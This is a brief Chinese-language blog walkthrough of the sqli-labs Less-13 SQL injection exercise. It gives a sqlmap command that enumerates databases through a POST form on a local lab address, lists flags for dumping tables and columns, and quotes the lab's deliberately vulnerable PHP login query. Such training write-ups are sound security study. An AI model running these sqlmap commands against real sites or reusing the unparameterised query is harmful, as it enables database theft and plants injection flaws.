目录
类型
双层-单引号及括号
获取数据库
python sqlmap.py -u "http://192.168.31.12/sqli-labs_1/Less-13/" --forms --dbms mysql --answers="extending=N" --threads 8 -dbs --batch
--forms参数还是比较快的,针对POST表单有三种方式,可以查看网络安全-sqlmap实战之sqlilabs-Less11中的小总结
之后的获取表名,列名及内容就不写了,还是-D、--tables、-T、--columns、-C、-dump、--dump-fomat参数
优化的话可以使用--technique BEU,基于时间的注入还是比较浪费时间的。
查看源代码
@$sql="SELECT username, password FROM users WHERE username=('$uname') and password=('$passwd') LIMIT 0,1";
更多内容查看:网络安全-自学笔记
喜欢本文的请动动小手点个赞,收藏一下,有问题请下方评论,转载请注明出处,并附有原文链接,谢谢!如有侵权,请及时联系。如果您感觉有所收获,自愿打赏,可选择支付宝18833895206(小于),您的支持是我不断更新的动力。